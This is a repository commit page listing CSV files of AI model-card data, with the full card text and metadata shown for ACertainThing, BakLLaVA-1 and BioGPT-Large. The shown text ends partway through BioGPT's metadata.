Add files using upload-large-folder tool
This view is limited to 50 files because it contains too many changes. See raw diff.
- ACertainThing_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +93 -0
- BakLLaVA-1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +43 -0
- BioGPT-Large_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +181 -0
- BiomedNLP-BiomedBERT-base-uncased-abstract-fulltext_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- CLIP-GmP-ViT-L-14_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +127 -0
- CausalLM-14B-GGUF_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +459 -0
- ClinicalBERT_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- CodeLlama-7b-hf_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- ControlNetMediaPipeFace_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +213 -0
- DCLM-7B_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +294 -0
- GOT-OCR2_0_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +436 -0
- Ghibli-Diffusion_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +99 -0
- InternVL-Chat-V1-5_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +655 -0
- Juggernaut-XL-v9_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +69 -0
- LWM-Text-Chat-1M_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +128 -0
- Llama-2-13B-chat-GGML_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv +299 -0
- Llama-3_1-Nemotron-Ultra-253B-v1_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +369 -0
- Llama3-8B-Chinese-Chat_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +0 -0
- Llama3-8B-Chinese-Chat_finetunes_20250425_125929.csv_finetunes_20250425_125929.csv +0 -0
- MiniCPM-V-2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +390 -0
- MiniCPM-V_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +189 -0
- MistoLine_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +172 -0
- NV-Embed-v2_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- OpenELM_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +286 -0
- Phi-3-medium-128k-instruct_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +523 -0
- QwQ-32B-Preview_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv +0 -0
- Qwen2-72B_finetunes_20250426_215237.csv_finetunes_20250426_215237.csv +0 -0
- Qwen2-7B-Instruct_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +0 -0
- ReaderLM-v2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +305 -0
- SD-Silicon_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +90 -0
- Step-Audio-TTS-3B_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +164 -0
- Tencent-Hunyuan-Large_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +387 -0
- Tifa-Deepsex-14b-CoT-GGUF-Q4_finetunes_20250425_041137.csv_finetunes_20250425_041137.csv +217 -0
- TinyR1-32B-Preview_finetunes_20250426_121513.csv_finetunes_20250426_121513.csv +252 -0
- TripoSR_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +57 -0
- UI-TARS-7B-SFT_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv +197 -0
- WanVideo_comfy_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +8 -0
- WhiteRabbitNeo-13B-v1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +522 -0
- WizardLM-13B-Uncensored_finetunes_20250425_143346.csv_finetunes_20250425_143346.csv +239 -0
- WizardLM-2-8x22B_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv +0 -0
- XTTS-v2_finetunes_20250424_150612.csv_finetunes_20250424_150612.csv +0 -0
- all-MiniLM-L12-v2_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- alpaca-lora-7b_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv +34 -0
- blip-image-captioning-large_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv +1130 -0
- bloom_finetunes_20250422_180448.csv +0 -0
- canary-1b-flash_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +641 -0
- chatgpt_paraphraser_on_T5_base_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv +333 -0
- chilloutmix_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +63 -0
- deberta-v3-large_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +0 -0
- fasttext-language-identification_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv +143 -0
ACertainThing_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
@@ -0,0 +1,93 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
JosephusCheung/ACertainThing,"---
language:
- en
license: creativeml-openrail-m
tags:
- stable-diffusion
- stable-diffusion-diffusers
- text-to-image
- diffusers
inference: true
widget:
- text: ""masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden""
  example_title: ""example 1girl""
- text: ""masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden""
  example_title: ""example 1boy""
---

# ACertainThing

**Try full functions with Google Colab free T4** [](https://colab.research.google.com/drive/1gwJViXR0UxoXx01qiU6uTSEKGjTagOgp?usp=sharing)

Anything3.0 is an overfitted model that takes liberties when it shouldn't be generating human images and certain details. However, the community has given it a high rating, and I believe that is because many lazy people who don't know how to write a prompt can use this overfitted model to generate high-quality images even if their prompts are poorly written.

Here is an ACertain version of Anything3.0, made with Dreambooth (idea of [LoRA](https://arxiv.org/abs/2106.09685) integrated), initialized with [ACertainModel](https://huggingface.co/JosephusCheung/ACertainModel).

Although this model may produce better results for image generation, it is built on two major problems. Firstly, it does not always stay true to your prompts; it adds irrelevant details, and sometimes these details are highly homogenized. Secondly, it is an unstable, overfitted model, similar to Anything3.0, and is not suitable for any form of further training. As far as I know, Anything3.0 is obtained by merging several models in just the right way, but it is itself an overfitted model with defects in both its saturation and configuration. However, as I mentioned earlier, it can make even poorly written prompts produce good output images, which leads many lazy people who are incapable of writing good prompts to quickly surpass those who study the writing of prompts carefully. Despite these problems, I still want to release an extended version of the model that caters to the preferences of many people in the community. I hope you will like it.

**In my personal view, I oppose all forms of model merging as it has no scientific principle and is nothing but a waste of time. It is a desire to get results without putting in the effort. That is why I do not like Anything3.0, or this model that is being released. But I respect the choices and preferences of the community, and I hope that you can also respect and understand my thoughts.**

If you want your prompts to be accurately output and want to learn the correct skills for using prompts, it is recommended that you use the more balanced model [ACertainModel](https://huggingface.co/JosephusCheung/ACertainModel).

e.g. **_masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden_**

## About online preview with Hosted inference API, also generation with this model

Parameters cannot be modified in the online preview, and it appears to generate with *Clip skip: 1*; for better performance, it is strongly recommended to use *Clip skip: 2* instead.

Here is an example of inference settings, if applicable on your own server: *Steps: 28, Sampler: Euler a, CFG scale: 11, Clip skip: 2*.

## 🧨 Diffusers

This model can be used just like any other Stable Diffusion model. For more information,
please have a look at the [Stable Diffusion](https://huggingface.co/docs/diffusers/api/pipelines/stable_diffusion).

You can also export the model to [ONNX](https://huggingface.co/docs/diffusers/optimization/onnx), [MPS](https://huggingface.co/docs/diffusers/optimization/mps) and/or FLAX/JAX.

```python
from diffusers import StableDiffusionPipeline
import torch

model_id = ""JosephusCheung/ACertainThing""
branch_name = ""main""

pipe = StableDiffusionPipeline.from_pretrained(model_id, revision=branch_name, torch_dtype=torch.float16)
pipe = pipe.to(""cuda"")

prompt = ""pikachu""
image = pipe(prompt).images[0]

image.save(""./pikachu.png"")
```

## Examples

Below are some examples of images generated using this model, with better performance on framing and hand gestures, as well as moving objects, compared to other analogues:

**Anime Girl:**

```
1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden
Steps: 28, Sampler: Euler a, CFG scale: 11, Seed: 114514, Clip skip: 2
```
**Anime Boy:**

```
1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden
Steps: 28, Sampler: Euler a, CFG scale: 11, Seed: 114514, Clip skip: 2
```

## License

This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage.
The CreativeML OpenRAIL License specifies:

1. You can't use the model to deliberately produce nor share illegal or harmful outputs or content
2. The authors claim no rights on the outputs you generate; you are free to use them and are accountable for their use, which must not go against the provisions set in the license
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully)
[Please read the full license here](https://huggingface.co/spaces/CompVis/stable-diffusion-license)

## Is it a NovelAI based model? What is the relationship with SD1.2 and SD1.4?

See [ASimilarityCalculatior](https://huggingface.co/JosephusCheung/ASimilarityCalculatior)","{""id"": ""JosephusCheung/ACertainThing"", ""author"": ""JosephusCheung"", ""sha"": ""f29dbc8b2737fa20287a7ded5c47973619b5c012"", ""last_modified"": ""2022-12-20 03:16:02+00:00"", ""created_at"": ""2022-12-13 18:05:27+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 530, ""downloads_all_time"": null, ""likes"": 188, ""library_name"": ""diffusers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""diffusers"", ""stable-diffusion"", ""stable-diffusion-diffusers"", ""text-to-image"", ""en"", ""arxiv:2106.09685"", ""doi:10.57967/hf/0197"", ""license:creativeml-openrail-m"", ""autotrain_compatible"", ""endpoints_compatible"", ""diffusers:StableDiffusionPipeline"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\ninference: true\nwidget:\n- text: masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1girl\n- text: masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1boy"", ""widget_data"": [{""text"": ""masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden"", ""example_title"": ""example 1girl""}, {""text"": ""masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn, cumulonimbus clouds, lighting, blue sky, falling leaves, garden"", ""example_title"": ""example 1boy""}], ""model_index"": null, ""config"": {""diffusers"": {""_class_name"": ""StableDiffusionPipeline""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ACertainThing-half.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='ACertainThing.ckpt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='feature_extractor/preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model_index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='safety_checker/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/acth-sample-1boy.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/acth-sample-1girl.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/anything3-sample-1boy.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='samples/anything3-sample-1girl.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='scheduler/scheduler_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='text_encoder/pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/special_tokens_map.json', 
size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer/vocab.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='unet/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vae/diffusion_pytorch_model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""Yntec/ToyWorld"", ""Yntec/PrintingPress"", ""Nymbo/image_gen_supaqueue"", ""ennov8ion/3dart-Models"", ""phenixrhyder/NSFW-ToyWorld"", ""Yntec/blitz_diffusion"", ""sanaweb/text-to-image"", ""Vedits/6x_Image_diffusion"", ""John6666/Diffusion80XX4sg"", ""ennov8ion/comicbook-models"", ""John6666/PrintingPress4"", ""PeepDaSlan9/B2BMGMT_Diffusion60XX"", ""Daniela-C/6x_Image_diffusion"", ""phenixrhyder/PrintingPress"", ""John6666/hfd_test_nostopbutton"", ""mindtube/Diffusion50XX"", ""TheKitten/Fast-Images-Creature"", ""Nymbo/Diffusion80XX4sg"", ""kaleidoskop-hug/PrintingPress"", ""ennov8ion/stablediffusion-models"", ""John6666/ToyWorld4"", ""grzegorz2047/fast_diffusion"", ""Alfasign/dIFFU"", ""Nymbo/PrintingPress"", ""Rifd/Sdallmodels"", ""John6666/Diffusion80XX4g"", ""NativeAngels/HuggingfaceDiffusion"", ""ennov8ion/Scifi-Models"", ""ennov8ion/semirealistic-models"", ""ennov8ion/dreamlike-models"", ""ennov8ion/FantasyArt-Models"", ""noes14155/img_All_models"", ""ennov8ion/500models"", ""AnimeStudio/anime-models"", ""John6666/Diffusion80XX4"", ""K00B404/HuggingfaceDiffusion_custom"", ""John6666/blitz_diffusion4"", ""John6666/blitz_diffusion_builtin"", ""RhythmRemix14/PrintingPressDx"", ""sohoso/PrintingPress"", ""NativeAngels/ToyWorld"", ""mindtube/maximum_multiplier_places"", ""animeartstudio/AnimeArtmodels2"", ""animeartstudio/AnimeModels"", ""Binettebob22/fast_diffusion2"", ""pikto/Elite-Scifi-Models"", ""PixelistStudio/3dart-Models"", ""devmiles/zexxiai"", ""Nymbo/Diffusion60XX"", ""TheKitten/Images"", ""ennov8ion/anime-models"", ""jordonpeter01/Diffusion70"", ""ennov8ion/Landscapes-models"", ""sohoso/anime348756"", ""ucmisanddisinfo/thisApp"", ""johann22/chat-diffusion"", ""K00B404/generate_many_models"", ""manivannan7gp/Words2Image"", ""ennov8ion/art-models"", ""ennov8ion/photo-models"", ""ennov8ion/art-multi"", ""vih-v/x_mod"", ""NativeAngels/blitz_diffusion"", ""NativeAngels/PrintingPress4"", ""NativeAngels/PrintingPress"", ""dehua68/ToyWorld"", ""burman-ai/Printing-Press"", ""sk16er/ghibli_creator"", ""sheldon/JosephusCheung-ACertainThing"", ""vanessa9178/AI-Generator"", ""ennov8ion/abstractart-models"", ""ennov8ion/Scifiart-Models"", ""ennov8ion/interior-models"", ""ennov8ion/room-interior-models"", ""animeartstudio/AnimeArtModels1"", ""Yntec/top_100_diffusion"", ""AIlexDev/Diffusion60XX"", ""flatindo/all-models"", ""flatindo/all-models-v1"", ""flatindo/img_All_models"", ""johann22/chat-diffusion-describe"", ""wideprism/Ultimate-Model-Collection"", ""GAIneZis/FantasyArt-Models"", ""TheMaisk/Einfach.ImageAI"", ""ennov8ion/picasso-diffusion"", ""K00B404/stablediffusion-portal"", ""ennov8ion/anime-new-models"", ""ennov8ion/anime-multi-new-models"", ""ennov8ion/photo-multi"", ""ennov8ion/anime-multi"", ""Ashrafb/comicbook-models"", ""sohoso/architecture"", ""K00B404/image_gen_supaqueue_game_assets"", ""GhadaSaylami/text-to-image"", ""Geek7/mdztxi"", ""Geek7/mdztxi2"", ""NativeAngels/Diffusion80XX4sg"", 
""GandalfTheBlack/PrintingPressDx"", ""GandalfTheBlack/IMG2IMG-695models"", ""tejani/PrintingPress""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2022-12-20 03:16:02+00:00"", ""cardData"": ""language:\n- en\nlicense: creativeml-openrail-m\ntags:\n- stable-diffusion\n- stable-diffusion-diffusers\n- text-to-image\n- diffusers\ninference: true\nwidget:\n- text: masterpiece, best quality, 1girl, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1girl\n- text: masterpiece, best quality, 1boy, brown hair, green eyes, colorful, autumn,\n cumulonimbus clouds, lighting, blue sky, falling leaves, garden\n example_title: example 1boy"", ""transformersInfo"": null, ""_id"": ""6398bee79d84601abcd5f0fb"", ""modelId"": ""JosephusCheung/ACertainThing"", ""usedStorage"": 12711483823}",0,,0,,0,,0,,0,"CompVis/stable-diffusion-license, Daniela-C/6x_Image_diffusion, John6666/Diffusion80XX4sg, John6666/PrintingPress4, John6666/ToyWorld4, John6666/hfd_test_nostopbutton, Nymbo/image_gen_supaqueue, PeepDaSlan9/B2BMGMT_Diffusion60XX, Yntec/PrintingPress, Yntec/ToyWorld, Yntec/blitz_diffusion, huggingface/InferenceSupport/discussions/new?title=JosephusCheung/ACertainThing&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BJosephusCheung%2FACertainThing%5D(%2FJosephusCheung%2FACertainThing)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kaleidoskop-hug/PrintingPress, phenixrhyder/NSFW-ToyWorld",14
BakLLaVA-1_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
@@ -0,0 +1,43 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
SkunkworksAI/BakLLaVA-1,"---
datasets:
- SkunkworksAI/BakLLaVA-1-FT
language:
- en
license: apache-2.0
---

<p><h1> BakLLaVA-1 </h1></p>

Thank you to our compute sponsors Together Compute (www.together.ai).
In collaboration with **Ontocord** (www.ontocord.ai) and **LAION** (www.laion.ai).



BakLLaVA 1 is a Mistral 7B base augmented with the LLaVA 1.5 architecture. In this first version, we showcase that a Mistral 7B base outperforms Llama 2 13B on several benchmarks.
You can run BakLLaVA-1 on our repo. We are currently updating it to make it easier for you to fine-tune and run inference (https://github.com/SkunkworksAI/BakLLaVA).

Note: BakLLaVA-1 is fully open-source but was trained on certain data that includes LLaVA's corpus, which is not commercially permissive. We will fix this in the upcoming release.

BakLLaVA 2 is cooking with a significantly larger (commercially viable) dataset and a novel architecture that expands beyond the current LLaVA method. BakLLaVA-2 will do away with the restrictions of BakLLaVA-1.

# Evaluations



# Training dataset

- 558K filtered image-text pairs from LAION/CC/SBU, captioned by BLIP.
- 158K GPT-generated multimodal instruction-following data.
- 450K academic-task-oriented VQA data mixture.
- 40K ShareGPT data.
- Additional private data (permissive)

","{""id"": ""SkunkworksAI/BakLLaVA-1"", ""author"": ""SkunkworksAI"", ""sha"": ""d8e5fd9f1c8d021bdb9a1108b72d4bca8c32d61f"", ""last_modified"": ""2023-10-23 21:26:30+00:00"", ""created_at"": ""2023-10-12 13:12:21+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 133, ""downloads_all_time"": null, ""likes"": 379, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""llava_mistral"", ""text-generation"", ""en"", ""dataset:SkunkworksAI/BakLLaVA-1-FT"", ""license:apache-2.0"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- SkunkworksAI/BakLLaVA-1-FT\nlanguage:\n- en\nlicense: apache-2.0"", ""widget_data"": [{""text"": ""My name is Julien and I like to""}, {""text"": ""I like traveling by train because""}, {""text"": ""Paris is an amazing place to visit,""}, {""text"": ""Once upon a time,""}], ""model_index"": null, ""config"": {""architectures"": [""LlavaMistralForCausalLM""], ""model_type"": ""llava_mistral"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": true}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00001-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model-00002-of-00002.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""limcheekin/BakLLaVA-1-GGUF"", ""QuantAsh/SkunkworksAI-BakLLaVA-1"", ""QuantAsh/SkunkworksAI-BakLLaVA-2"", ""SengTak/SkunkworksAI-BakLLaVA-1"", ""jasongoodison/SkunkworksAI-BakLLaVA-1"", ""scasella91/SkunkworksAI-BakLLaVA-1"", ""jerrybaba/moai-demo"", ""Meysam1986/SkunkworksAI-BakLLaVA-1"", ""jaemil/SkunkworksAI-BakLLaVA-1""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-10-23 21:26:30+00:00"", ""cardData"": ""datasets:\n- SkunkworksAI/BakLLaVA-1-FT\nlanguage:\n- en\nlicense: apache-2.0"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": null}, ""_id"": ""6527f0b551d1165df6760e12"", ""modelId"": ""SkunkworksAI/BakLLaVA-1"", ""usedStorage"": 196792796145}",0,,0,,0,,0,,0,"Meysam1986/SkunkworksAI-BakLLaVA-1, QuantAsh/SkunkworksAI-BakLLaVA-1, QuantAsh/SkunkworksAI-BakLLaVA-2, SengTak/SkunkworksAI-BakLLaVA-1, 
huggingface/InferenceSupport/discussions/new?title=SkunkworksAI/BakLLaVA-1&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BSkunkworksAI%2FBakLLaVA-1%5D(%2FSkunkworksAI%2FBakLLaVA-1)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jaemil/SkunkworksAI-BakLLaVA-1, jasongoodison/SkunkworksAI-BakLLaVA-1, jerrybaba/moai-demo, limcheekin/BakLLaVA-1-GGUF, scasella91/SkunkworksAI-BakLLaVA-1",10
BioGPT-Large_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
@@ -0,0 +1,181 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
microsoft/BioGPT-Large,"---
license: mit
datasets:
- pubmed
language:
- en
library_name: transformers
pipeline_tag: text-generation
tags:
- medical
widget:
- text: COVID-19 is
inference:
  parameters:
    max_new_tokens: 50
---

## BioGPT

Pre-trained language models have attracted increasing attention in the biomedical domain, inspired by their great success in the general natural language domain. Among the two main branches of pre-trained language models in the general language domain, i.e. BERT (and its variants) and GPT (and its variants), the first one has been extensively studied in the biomedical domain, such as BioBERT and PubMedBERT. While they have achieved great success on a variety of discriminative downstream biomedical tasks, the lack of generation ability constrains their application scope. In this paper, we propose BioGPT, a domain-specific generative Transformer language model pre-trained on large-scale biomedical literature. We evaluate BioGPT on six biomedical natural language processing tasks and demonstrate that our model outperforms previous models on most tasks. Especially, we get 44.98%, 38.42% and 40.76% F1 score on BC5CDR, KD-DTI and DDI end-to-end relation extraction tasks, respectively, and 78.2% accuracy on PubMedQA, creating a new record. Our case study on text generation further demonstrates the advantage of BioGPT on biomedical literature to generate fluent descriptions for biomedical terms.

## Citation

If you find BioGPT useful in your research, please cite the following paper:

```latex
@article{10.1093/bib/bbac409,
    author = {Luo, Renqian and Sun, Liai and Xia, Yingce and Qin, Tao and Zhang, Sheng and Poon, Hoifung and Liu, Tie-Yan},
    title = ""{BioGPT: generative pre-trained transformer for biomedical text generation and mining}"",
    journal = {Briefings in Bioinformatics},
    volume = {23},
    number = {6},
    year = {2022},
    month = {09},
    abstract = ""{Pre-trained language models have attracted increasing attention in the biomedical domain, inspired by their great success in the general natural language domain. Among the two main branches of pre-trained language models in the general language domain, i.e. BERT (and its variants) and GPT (and its variants), the first one has been extensively studied in the biomedical domain, such as BioBERT and PubMedBERT. While they have achieved great success on a variety of discriminative downstream biomedical tasks, the lack of generation ability constrains their application scope. In this paper, we propose BioGPT, a domain-specific generative Transformer language model pre-trained on large-scale biomedical literature. We evaluate BioGPT on six biomedical natural language processing tasks and demonstrate that our model outperforms previous models on most tasks. Especially, we get 44.98\%, 38.42\% and 40.76\% F1 score on BC5CDR, KD-DTI and DDI end-to-end relation extraction tasks, respectively, and 78.2\% accuracy on PubMedQA, creating a new record. Our case study on text generation further demonstrates the advantage of BioGPT on biomedical literature to generate fluent descriptions for biomedical terms.}"",
    issn = {1477-4054},
    doi = {10.1093/bib/bbac409},
    url = {https://doi.org/10.1093/bib/bbac409},
    note = {bbac409},
    eprint = {https://academic.oup.com/bib/article-pdf/23/6/bbac409/47144271/bbac409.pdf},
}
```","{""id"": ""microsoft/BioGPT-Large"", ""author"": ""microsoft"", ""sha"": ""c6a5136a91c5e3150d9f05ab9d33927a3210a22e"", ""last_modified"": ""2023-02-05 06:18:14+00:00"", ""created_at"": ""2023-02-03 16:17:26+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 7980, ""downloads_all_time"": null, ""likes"": 196, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""biogpt"", ""text-generation"", ""medical"", ""en"", ""dataset:pubmed"", ""license:mit"", ""autotrain_compatible"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- pubmed\nlanguage:\n- en\nlibrary_name: transformers\nlicense: mit\npipeline_tag: text-generation\ntags:\n- medical\nwidget:\n- text: COVID-19 is\ninference:\n parameters:\n max_new_tokens: 50"", ""widget_data"": [{""text"": ""COVID-19 is""}], ""model_index"": null, ""config"": {""architectures"": [""BioGptForCausalLM""], ""model_type"": ""biogpt"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<pad>"", ""sep_token"": ""</s>"", ""unk_token"": ""<unk>""}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""katielink/biogpt-large-demo"", ""Sharathhebbar24/One-stop-for-Open-source-models"", ""kadirnar/Whisper_M2M100_BioGpt"", ""katielink/compare-bio-llm"", ""flash64/biogpt-testing"", ""MMYang/microsoft-BioGPT-Large"", ""MohammedAlakhras/ChatDoctor"", ""RamboRogers/BioGPT"", ""arohcx/colab"", ""Vrda/microsoft-BioGPT-Large"", ""partnersfactory/microsoft-BioGPT-Large"", ""Mzeshle/microsoft-BioGPT-Large"", ""ZaddyMattty/microsoft-BioGPT-Large"", ""caliex/demo-med"", ""yejunbin/microsoft-BioGPT-Large"", ""yuzhengao/microsoft-BioGPT-Large"", ""Huggingmaces/microsoft-BioGPT-Large"", 